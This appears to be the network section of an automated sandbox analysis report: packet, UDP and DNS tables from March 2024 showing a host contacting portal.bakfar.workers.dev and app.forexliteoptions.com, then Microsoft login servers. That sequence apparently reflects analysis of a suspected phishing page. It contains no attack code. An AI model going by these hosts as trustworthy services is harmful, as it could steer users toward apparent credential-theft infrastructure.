                                                                      Mar 29, 2024 00:21:07.751662970 CET4434976423.221.242.90192.168.2.4
                                                                      Mar 29, 2024 00:21:07.751770020 CET49764443192.168.2.423.221.242.90
                                                                      Mar 29, 2024 00:21:08.330104113 CET49764443192.168.2.423.221.242.90
                                                                      Mar 29, 2024 00:21:08.330132008 CET4434976423.221.242.90192.168.2.4
                                                                      Mar 29, 2024 00:21:08.330143929 CET49764443192.168.2.423.221.242.90
                                                                      Mar 29, 2024 00:21:08.330149889 CET4434976423.221.242.90192.168.2.4
                                                                      Mar 29, 2024 00:21:15.890501022 CET44349757172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:21:15.890544891 CET44349757172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:21:15.890701056 CET49757443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:21:16.559662104 CET49757443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:21:16.559674025 CET44349757172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:21:16.658493042 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:16.658528090 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:16.659338951 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:16.660406113 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:16.660419941 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:16.954314947 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:16.954516888 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:16.954540014 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:16.955429077 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:16.955488920 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:17.158165932 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:17.158277988 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:17.208242893 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:17.208266020 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:21:17.248953104 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:21:20.522088051 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.522123098 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.522195101 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.522480011 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.522497892 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.829713106 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.865087986 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.865094900 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.866039038 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.866096020 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.869378090 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.869435072 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.869590998 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:20.869599104 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:20.934684038 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.133069992 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133090973 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133096933 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133126974 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133140087 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133152962 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133161068 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.133182049 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133203030 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.133230925 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.133371115 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133416891 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.133424044 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133434057 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:21.133485079 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.169199944 CET49780443192.168.2.413.107.246.41
                                                                      Mar 29, 2024 00:21:21.169212103 CET4434978013.107.246.41192.168.2.4
                                                                      Mar 29, 2024 00:21:39.538408041 CET8049724162.222.105.35192.168.2.4
                                                                      Mar 29, 2024 00:21:39.538513899 CET4972480192.168.2.4162.222.105.35
                                                                      Mar 29, 2024 00:21:39.538736105 CET4972480192.168.2.4162.222.105.35
                                                                      Mar 29, 2024 00:21:39.632975101 CET8049724162.222.105.35192.168.2.4
                                                                      Mar 29, 2024 00:22:02.218415976 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:22:02.218436003 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:22:05.592389107 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:05.592418909 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:05.592816114 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:05.593084097 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:05.593096018 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:05.812611103 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:05.813008070 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:05.813024998 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:05.813316107 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:05.813699961 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:05.813762903 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:05.856863976 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:14.716125011 CET4972380192.168.2.423.53.126.74
                                                                      Mar 29, 2024 00:22:14.819416046 CET804972323.53.126.74192.168.2.4
                                                                      Mar 29, 2024 00:22:14.819533110 CET4972380192.168.2.423.53.126.74
                                                                      Mar 29, 2024 00:22:15.818939924 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:15.819000959 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:15.819134951 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:16.330384016 CET49791443192.168.2.4172.253.122.147
                                                                      Mar 29, 2024 00:22:16.330409050 CET44349791172.253.122.147192.168.2.4
                                                                      Mar 29, 2024 00:22:17.353060007 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:22:17.353153944 CET44349767192.229.211.199192.168.2.4
                                                                      Mar 29, 2024 00:22:17.353244066 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:22:17.547256947 CET49767443192.168.2.4192.229.211.199
                                                                      Mar 29, 2024 00:22:17.547278881 CET44349767192.229.211.199192.168.2.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 29, 2024 00:21:01.204471111 CET53541051.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:01.277817011 CET53620611.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:01.882034063 CET53580691.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.074316978 CET5225953192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.074410915 CET5923153192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.177390099 CET53522591.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.177416086 CET53592311.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.656069994 CET6401753192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.656069994 CET6513953192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.656749964 CET5723153192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.656749964 CET6205153192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.657428026 CET5447953192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.657428026 CET5236553192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.657727957 CET6212853192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.657727957 CET5777253192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.658113956 CET5239453192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.658113956 CET5331453192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.658480883 CET5531053192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.658480883 CET6257853192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.672964096 CET5310453192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.676413059 CET4969253192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:03.751605988 CET53640171.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.751667023 CET53651391.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.751940012 CET53620511.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.752583981 CET53625841.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.752633095 CET53523651.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.752788067 CET53572311.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.753669977 CET53637001.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.754013062 CET53625781.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.755038023 CET53553101.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.760577917 CET53533141.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.763293028 CET53523941.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.768683910 CET53531041.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:03.771426916 CET53496921.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:04.422518015 CET53495201.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:04.690390110 CET6007553192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:04.690701962 CET5226153192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:04.693537951 CET5557053192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:04.693974972 CET6033653192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:04.789565086 CET53555701.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:04.790332079 CET53603361.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:04.973404884 CET53597211.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:05.550165892 CET5940153192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:05.551129103 CET5451553192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:05.646116972 CET53594011.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:05.647218943 CET53545151.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:06.155275106 CET5488653192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:06.156013012 CET5229253192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:06.157869101 CET5664853192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:06.158130884 CET5431353192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:06.169563055 CET6152553192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:06.169826984 CET6536653192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:06.250891924 CET53548861.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:06.254051924 CET53522921.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:06.269768953 CET53653661.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:06.278767109 CET53615251.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:15.762027979 CET4988153192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:15.762331963 CET6545753192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:16.557706118 CET5161253192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:16.558217049 CET6370953192.168.2.41.1.1.1
                                                                      Mar 29, 2024 00:21:16.655194998 CET53516121.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:16.656042099 CET53637091.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:18.902805090 CET53561171.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:20.771892071 CET53570781.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:21:26.292980909 CET138138192.168.2.4192.168.2.255
                                                                      Mar 29, 2024 00:21:39.656318903 CET53551601.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:22:01.098850965 CET53622091.1.1.1192.168.2.4
                                                                      Mar 29, 2024 00:22:02.767940044 CET53513131.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Mar 29, 2024 00:21:03.074316978 CET192.168.2.41.1.1.10xd181Standard query (0)portal.bakfar.workers.devA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.074410915 CET192.168.2.41.1.1.10x916aStandard query (0)portal.bakfar.workers.dev65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.656069994 CET192.168.2.41.1.1.10x7cd9Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.656069994 CET192.168.2.41.1.1.10x7388Standard query (0)code.jquery.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.656749964 CET192.168.2.41.1.1.10xc766Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.656749964 CET192.168.2.41.1.1.10xf346Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.657428026 CET192.168.2.41.1.1.10x319eStandard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.657428026 CET192.168.2.41.1.1.10xd6f0Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.657727957 CET192.168.2.41.1.1.10xf220Standard query (0)kit-free.fontawesome.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.657727957 CET192.168.2.41.1.1.10x7355Standard query (0)kit-free.fontawesome.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.658113956 CET192.168.2.41.1.1.10x116fStandard query (0)app.forexliteoptions.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.658113956 CET192.168.2.41.1.1.10x399Standard query (0)app.forexliteoptions.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.658480883 CET192.168.2.41.1.1.10xa3a7Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.658480883 CET192.168.2.41.1.1.10xec87Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.672964096 CET192.168.2.41.1.1.10xd795Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.676413059 CET192.168.2.41.1.1.10x42d8Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.690390110 CET192.168.2.41.1.1.10x36ecStandard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.690701962 CET192.168.2.41.1.1.10x9216Standard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.693537951 CET192.168.2.41.1.1.10x775cStandard query (0)i.gyazo.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.693974972 CET192.168.2.41.1.1.10x5e16Standard query (0)i.gyazo.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.550165892 CET192.168.2.41.1.1.10xa8b4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.551129103 CET192.168.2.41.1.1.10x197eStandard query (0)www.google.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.155275106 CET192.168.2.41.1.1.10x1136Standard query (0)i.gyazo.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.156013012 CET192.168.2.41.1.1.10x2b05Standard query (0)i.gyazo.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.157869101 CET192.168.2.41.1.1.10xd54Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.158130884 CET192.168.2.41.1.1.10xcda0Standard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.169563055 CET192.168.2.41.1.1.10xbb4Standard query (0)portal.bakfar.workers.devA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.169826984 CET192.168.2.41.1.1.10x1571Standard query (0)portal.bakfar.workers.dev65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:15.762027979 CET192.168.2.41.1.1.10x10aaStandard query (0)account.live.comA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:15.762331963 CET192.168.2.41.1.1.10x5fa9Standard query (0)account.live.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.557706118 CET192.168.2.41.1.1.10xd0a9Standard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.558217049 CET192.168.2.41.1.1.10xd3afStandard query (0)logincdn.msftauth.net65IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Mar 29, 2024 00:21:03.177390099 CET1.1.1.1192.168.2.40xd181No error (0)portal.bakfar.workers.dev172.67.154.137A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.177390099 CET1.1.1.1192.168.2.40xd181No error (0)portal.bakfar.workers.dev104.21.72.191A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.177416086 CET1.1.1.1192.168.2.40x916aNo error (0)portal.bakfar.workers.dev65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.751605988 CET1.1.1.1192.168.2.40x7cd9No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.751605988 CET1.1.1.1192.168.2.40x7cd9No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.751605988 CET1.1.1.1192.168.2.40x7cd9No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.751605988 CET1.1.1.1192.168.2.40x7cd9No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.751940012 CET1.1.1.1192.168.2.40xf346No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.751940012 CET1.1.1.1192.168.2.40xf346No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.752633095 CET1.1.1.1192.168.2.40xd6f0No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.752722025 CET1.1.1.1192.168.2.40x319eNo error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.752788067 CET1.1.1.1192.168.2.40xc766No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.754013062 CET1.1.1.1192.168.2.40xec87No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.754605055 CET1.1.1.1192.168.2.40x7355No error (0)kit-free.fontawesome.comkit-free.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.755038023 CET1.1.1.1192.168.2.40xa3a7No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.755038023 CET1.1.1.1192.168.2.40xa3a7No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.755713940 CET1.1.1.1192.168.2.40xf220No error (0)kit-free.fontawesome.comkit-free.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.763293028 CET1.1.1.1192.168.2.40x116fNo error (0)app.forexliteoptions.com199.115.115.118A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.768683910 CET1.1.1.1192.168.2.40xd795No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.768683910 CET1.1.1.1192.168.2.40xd795No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:03.771426916 CET1.1.1.1192.168.2.40x42d8No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.784499884 CET1.1.1.1192.168.2.40x7cc2No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback-first.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.786520958 CET1.1.1.1192.168.2.40x9216No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.786540985 CET1.1.1.1192.168.2.40x36ecNo error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.789565086 CET1.1.1.1192.168.2.40x775cNo error (0)i.gyazo.com104.18.24.163A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.789565086 CET1.1.1.1192.168.2.40x775cNo error (0)i.gyazo.com104.18.25.163A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:04.790332079 CET1.1.1.1192.168.2.40x5e16No error (0)i.gyazo.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.646116972 CET1.1.1.1192.168.2.40xa8b4No error (0)www.google.com172.253.122.147A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.646116972 CET1.1.1.1192.168.2.40xa8b4No error (0)www.google.com172.253.122.103A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.646116972 CET1.1.1.1192.168.2.40xa8b4No error (0)www.google.com172.253.122.105A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.646116972 CET1.1.1.1192.168.2.40xa8b4No error (0)www.google.com172.253.122.99A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.646116972 CET1.1.1.1192.168.2.40xa8b4No error (0)www.google.com172.253.122.106A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.646116972 CET1.1.1.1192.168.2.40xa8b4No error (0)www.google.com172.253.122.104A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:05.647218943 CET1.1.1.1192.168.2.40x197eNo error (0)www.google.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.250891924 CET1.1.1.1192.168.2.40x1136No error (0)i.gyazo.com104.18.25.163A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.250891924 CET1.1.1.1192.168.2.40x1136No error (0)i.gyazo.com104.18.24.163A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.253336906 CET1.1.1.1192.168.2.40xd54No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.254051924 CET1.1.1.1192.168.2.40x2b05No error (0)i.gyazo.com65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.255914927 CET1.1.1.1192.168.2.40xcda0No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.258636951 CET1.1.1.1192.168.2.40xb729No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback-first.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.269768953 CET1.1.1.1192.168.2.40x1571No error (0)portal.bakfar.workers.dev65IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.278767109 CET1.1.1.1192.168.2.40xbb4No error (0)portal.bakfar.workers.dev104.21.72.191A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:06.278767109 CET1.1.1.1192.168.2.40xbb4No error (0)portal.bakfar.workers.dev172.67.154.137A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:15.858346939 CET1.1.1.1192.168.2.40x10aaNo error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:15.858578920 CET1.1.1.1192.168.2.40x5fa9No error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.654056072 CET1.1.1.1192.168.2.40x2c20No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback-first.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.655194998 CET1.1.1.1192.168.2.40xd0a9No error (0)logincdn.msftauth.netcs1227.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.655194998 CET1.1.1.1192.168.2.40xd0a9No error (0)cs1227.wpc.alphacdn.net192.229.211.199A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.656042099 CET1.1.1.1192.168.2.40xd3afNo error (0)logincdn.msftauth.netcs1227.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.761037111 CET1.1.1.1192.168.2.40xe52No error (0)cs1227.wpc.alphacdn.net192.229.211.199A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.770503044 CET1.1.1.1192.168.2.40xa7a9No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.770503044 CET1.1.1.1192.168.2.40xa7a9No error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:16.770503044 CET1.1.1.1192.168.2.40xa7a9No error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:19.026031017 CET1.1.1.1192.168.2.40x9b9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:19.026031017 CET1.1.1.1192.168.2.40x9b9No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:20.492455006 CET1.1.1.1192.168.2.40xa7dcNo error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:20.492455006 CET1.1.1.1192.168.2.40xa7dcNo error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:20.492455006 CET1.1.1.1192.168.2.40xa7dcNo error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:21.311798096 CET1.1.1.1192.168.2.40xf6e9No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback-first.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:32.456921101 CET1.1.1.1192.168.2.40x9665No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
